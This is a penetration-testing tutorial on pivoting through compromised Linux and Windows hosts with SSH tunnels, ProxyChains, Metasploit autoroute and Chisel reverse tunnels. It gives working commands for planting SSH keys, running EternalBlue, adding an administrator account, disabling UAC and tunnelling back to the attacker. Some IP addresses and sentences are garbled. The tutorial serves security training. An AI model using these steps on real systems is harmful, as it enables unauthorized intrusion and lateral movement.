The shades of tunneling
Solution for common pivoting problems during a Penetration Test
by Karol Mazurek
During penetration testing, you may encounter the scenario when you want to be able to pivot through one of the compromised hosts to gain access to other systems in the internal network and continue testing. In this article, you will be guided through 3 scenarios of pivoting and you will learn different tools and techniques that can help you achieve this goal.
You had gained
root privilege over the Linux Server and conducted a host discovery in the internal network, that only the compromised host has access to. Now you want to pivot through this host. How to do it quickly?
1.1. SSH & PROXYCHAINS
- One way to achieve this goal is by using SSH dynamic port forwarding which establishes a secure channel between an SSH client and SSH server.
- It listens on a local port and anything sent to this port is forwarded through the SSH tunnel to the SSH server which determines where to send the traffic.
- SSH functions as a SOCKS4 or SOCKS5 proxy server.
### ON YOUR MACHINE (10.10.10.1)
# CREATE A DIRECTORY FOR MANAGING KEYS
mkdir piv_keys && chmod 700 piv_keys
# GENERATE NEW SSH KEY
ssh-keygen -f piv_keys/id_rsa_1
# COPY PUBLIC KEY CONTENT TO CLIPBOARD
cat piv_keys/id_rsa_1 | clip.exe # OR JUST CAT AND COPY### ON A COMPROMISED MACHINE (10.10.10.2)
# ADD YOUR SSH PUBLIC KEY TO authorized_keys
echo "ssh-rsa AAAA...[REDACTED]..." >> /root/.ssh/authorized_keys### ON YOUR HOST (10.10.10.1)
# START SSH DYNAMIC PORT FORWARDING
ssh -D 9999 -f -N [email protected] -i piv_keys/id_rsa_1
ON YOUR HOST (10.10.10.1)
# CONFIGURE PROXYCHAINS (/etc/proxychains4.conf)
# add proxy here ...
# defaults set to "tor"
socks5 127.0.0.1 9999
After adding the above line to the config file, you can start using any tool with
proxychains , you can see some examples below:
- When it comes to using
nmap, only TCP Connect Scan (
- You can read more about using
- This way, you can interact with the subnet (
22.214.171.124/24) from your starting host (
10.10.10.1) with no need to upload the tools to the jump host (
10.10.10.2) and installing them.
How do ProxyChains actually works?
ProxyChains is a UNIX program, that hooks network-related libc functions in dynamically linked programs via a preloaded DLL and redirects the connections through SOCKS4/5 or HTTP proxies.
1. When you create a SSH tunnel between your starting machine (
10.10.10.1) and Remote Server (
10.10.10.2), to access the internal network (
126.96.36.199/24) you additionally open TCP socket on port 9999 locally (
2. So now you need to somehow interact with this newly created socket (
127.0.0.1:9999)which in fact works as a TCP Proxy Server to access the SSH tunnel between
10.10.10.2 and here comes the ProxyChains.
3. It connects to
127.0.0.1:9999 and wraps any requests to
10.10.10.1 which is then forwarded by SSH client (
10.10.10.1) to SSH server (
ProxyChains works only on dynamically linked programs.
Both ProxyChains and the tool to call must use the same same libc.
You can only use TCP connect technique for port scanning.
1.2. METASPLOIT & AUTOROUTE & PORTFWD
### ON YOUR HOST IN MSFCONSOLE (10.10.10.1) # PIVOT USING ROUTE COMMAND route add 188.8.131.52/24 2 # PIVOT USING AUTOROUTE use post/multi/manage/autoroute set session 2 run # PIVOT USING AUTOROUTE IN METERPRETER SESSION meterpreter> run autoroute -s 184.108.40.206/24 meterpreter> run autoroute -p
- Now Metasploit modules will “automagically” pivot through the compromised host and the target systems on the internal network (
- For example, you found that
220.127.116.11is vulnerable to MS17–010 EternalBlue. To exploit this vuln, just run the proper module and set things up, like the target system is in your subnet:
### ON YOUR HOST IN MSFCONSOLE (10.10.10.1) # EXPLOIT MS17–010 EternalBlue use exploit/windows/smb/ms17_010_psexec set LHOST 10.10.10.1 set RHOST 18.104.22.168 run
- Another example, if you want to conduct TCP Connect Scan over the subnet
ON YOUR HOST IN MSFCONSOLE (10.10.10.1)
# CONDUCT TCP CONNECT SCAN
set RHOSTS 22.214.171.124/24
set PORTS 1-1024
set THREADS 50
- If you want to connect with RDP using Metasploit Framework as a tunnel:
METASPLOIT TUNNEL FROM LOCALHOST TO 126.96.36.199 FOR RDP
portfwd add –l 3389 –p 3389 –r 188.8.131.52
### CONNECT USING TUNNEL
You had managed to pivot through a compromised host (
184.108.40.206) and gained a low privileged user
CRIMSON\bofer on the Windows Server (
220.127.116.11). During the investigation on the newly compromised host, you found that you can leverage the buffer overflow vulnerability, that lies in the
printer.exe(service running on
127.0.0.1:4444) for privilege escalation to
NT AUTHORITY\SYSTEM . You downloaded the vulnerable
printer.exe to your machine, developed an exploit, wonder how to send it from your host (
10.10.10.1) to the Windows Server (
printer.exe running on the loopback interface (
- This time there is no way to use an SSH server on the target (Windows System
18.104.22.168) since there is no SSH preinstalled and you have no privileges to install it.
- In such a situation, it will be a good idea to use
chisel.exethrough a previously established SSH tunnel with ProxyChains for tunneling.
### ON YOUR HOST (10.10.10.1) # START CHISEL SERVER ON PORT 8000 proxychains chisel server -p 8000 --reverse # START NETCAT LISTENER ON PORT 4000 nc -nlvp 4000### ON A COMPROMISED MACHINE (22.214.171.124) # START CHISEL CLIENT chisel.exe client 10.10.10.1:8000 R:4000:127.0.0.1:4444
- Now if you want to exploit buffer overflow on the vulnerable service available only on
126.96.36.199from your machine (10.10.10.1), you have to run a developed exploit against
10.10.10.1:4000on your host.
You had gained
NT AUTHORITY\SYSTEM on another Windows Server (
188.8.131.52) through MS17–010 EternalBlue and during the post-exploitation pillaging acquire a piece of information from the browser history of the user
CRIMSON\karmaz that he was connecting to a website
http://184.108.40.206:80/blog . That is why you conduct a host discovery of adjacent network segment (
220.127.116.11/24). You have found one, new host from this subnet:
18.104.22.168. Now, how to proxy traffic to this newly found host from your starting machine (
3.1. OpenSSH & PROXYCHAINS
- Since you got
NT AUTHORITY\SYSTEMyou can install anything you want on the compromised Windows Server.
- In such a scenario OpenSSH comes in handy, install it if it is not available.
### ON COMPROMISED HOST USING METERPRETER SESSION (22.214.171.124) ## GUIDE USING RDP: # TURN ON RDP ON THE COMPROMISED MACHINE run getgui -e # ADD USER IF THERE ARE NON run getgui -u karmazRDP -p karmaz!RDP123 # USER SHOULD BE IN ADMINISTRATOR GROUP, IF NOT - ADD HIM shell net localgroup administrators karmazRDP /add### ON YOUR HOST (10.10.10.1) # CONNECT OVER PROXYCHAINS & RDP USING PREVIOUS TUNNEL proxychains xfreerdp /u:DOMAIN\\karmazRDP /p:karmaz\!RDP123 /v:10.10.10.1### ON COMPROMISED HOST USING RDP WINDOW # DOWNLOAD latest release of OpenSSH: LINK # INSTALL OpenSSH instructions: LINK # GENERATE NEW KEY PAIR ssh-keygen # START SSH AGENT & ADD NEW IDENTITY Start-Service ssh-agent ssh-add C:\Users\karmazRDP\.ssh\id_rsa # ADD PUBLIC KEY TO authorized_keys copy content of ~\.ssh\id_rsa.pub add it to C:\ProgramData\ssh\administrators_authorized_keys
- The tricky part is, if the user you logged in via SSH client is part of the local Administrator group, then his public key has to be added to
C:\ProgramData\ssh\administrators_authorized_keysnot to the
- Another common problem is wrong permissions set on the file and you can mitigate this using the below PowerShell script:
$acl = Get-Acl C:\ProgramData\ssh\administrators_authorized_keys $acl.SetAccessRuleProtection($true, $false) $administratorsRule = New-Object system.security.accesscontrol.filesystemaccessrule("Administrators","FullControl","Allow") $systemRule = New-Object system.security.accesscontrol.filesystemaccessrule("SYSTEM","FullControl","Allow") $acl.SetAccessRule($administratorsRule) $acl.SetAccessRule($systemRule) $acl | Set-Acl
- If you want to install OpenSSH from the command line, even if you are
NT AUTHORITY\SYSTEMyou have to switch off UAC because it will pop up a message window that you cannot handle from the command line.
## GUIDE USING COMMAND LINE (WITHOUT RDESKTOP) # SET UAC TO 0 C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f # REBOOT THE SYSTEM shutdown /r # RENEW THE METERPRETER SESSION AND FOLLOW THE RDP STEPS FROM ABOVE
- Now to set a tunnel from
126.96.36.199/24subnet, you have to use the same private key on the
10.10.10.2which corresponding public key is added to the authorized_keys on the
### ON THE SECOND JUMP HOST - 188.8.131.52 Copy private key i.e. content of ~\.ssh\id_rsa### ON THE FIRST JUMP HOST - 10.10.10.2 # MAKE A BACKUP OF OLD ROOT PRIVATE KEY AND PUBLIC KEY cp /root/.ssh/id_rsa /root/.ssh/id_rsa.bck cp /root/.ssh/id_rsa.pub /root/.ssh/id_rsa.pub.bck # MAKE NEW PRIVATE KEY FILE AND NAME IT id_rsa # PASTE THE COPIED PRIVATE KEY FROM 184.108.40.206 IN ~/.ssh/id_rsa # SET CORRECT PERMISSIONS chmod 600 /root/.ssh/id_rsa # CREATE NEW PUBLIC KEY ssh-keygen -y -f /root/.ssh/id_rsa > /root/.ssh/id_rsa.pub### ON THE STARTING HOST - 10.10.10.1 # MAKE A BACKUP OF OLD ROOT PRIVATE KEY AND PUBLIC KEY cp ~/.ssh/id_rsa ~/.ssh/id_rsa.bck cp ~/.ssh/id_rsa.pub ~/.ssh/id_rsa.pub.bck # PASTE THE COPIED PRIVATE KEY FROM 220.127.116.11 IN ~/.ssh/id_rsa # SET CORRECT PERMISSIONS chmod 600 ~/.ssh/id_rsa # CREATE NEW PUBLIC KEY ssh-keygen -y -f ~/.ssh/id_rsa > ~/.ssh/id_rsa.pub # CREATE A TUNNEL ssh -J [email protected] DOMAIN/[email protected] -N -f -D 9999
- The reason why you have to generate a new public key is if it belongs to a different identity file, then the SSH client will not initiate the connection.
- Now you can use this tunnel via ProxyChains as before in scenario 1 and packets will be tunneled from the starting machine (
10.10.10.1) to any host in the
3.2. CHISEL & PROXYCHAINS
- The above example with OpenSSH is more persistent and stable, but it takes more time to set up and administrator privileges are needed if the sshd is not preinstalled and enabled.
- A quick way to achieve the same goal could be to set up SOCKS Proxies with
### ON STARTING HOST # BUILD chisel.elf FOR FIRST JUMP HOST - 10.10.10.2 GOOS=linux GOARCH=amd64 go build -ldflags="-s -w" . # BUILD chisel.exe FOR SECOND JUMP HOST - 10.10.10.2 GOOS=windows GOARCH=386 go build -ldflags="-s -w" . # UPLAOD chisels TO FIRST JUMP HOST - 10.10.10.2 scp chisel [email protected]:/root/chisel scp chisel.exe [email protected]:/root/chisel.exe # OR DONWLOAD APPROPRIATE VERSION FROM RELEASE PAGE https://github.com/jpillora/chisel/releases # START THE CHISEL SERVER ./chisel server --socks5 --reverse -p 9001### ON THE FIRST JUMPHOST - 10.10.10.2 # CONNECT TO THE SERVER AND START REMOTE REVERSE ON 9998 ./chisel client 10.10.10.1:9001 R:9998:socks & # START THE CHISEL SERVER FOR SECOND JUMPHOST - 18.104.22.168 ./chisel server --socks5 --reverse -p 9002### ON THE SECOND JUMPHOST - 22.214.171.124 # UPLOAD chisel.exe TO THE SECOND JUMPHOST AND RUN CHISEL CLIENT .\chisel.exe client 126.96.36.199:9002 R:8888:socks
- At the end edit the ProxyChains configuration file:
- Now you can access the subnet
188.8.131.52/24and the subnet
184.108.40.206/24from your starting host
3.3. METASPLOIT & AUTOROUTE
- You can use Metasploit if you managed to establish the meterpreter session with the (
- You have the option to use this session for the second pivot to gain access to systems in the
### ON YOUR HOST IN MSFCONSOLE (10.10.10.1) # PIVOT USING ROUTE COMMAND route add 220.127.116.11/24 3 # PIVOT USING AUTOROUTE use post/multi/manage/autoroute set session 3 run # PIVOT USING AUTOROUTE IN METERPRETER SESSION meterpreter> run autoroute -s 18.104.22.168/24 meterpreter> run autoroute -p
- The Metasploit modules will “automagically” pivot through the (
22.214.171.124) and then through (
126.96.36.199) to access the internal network (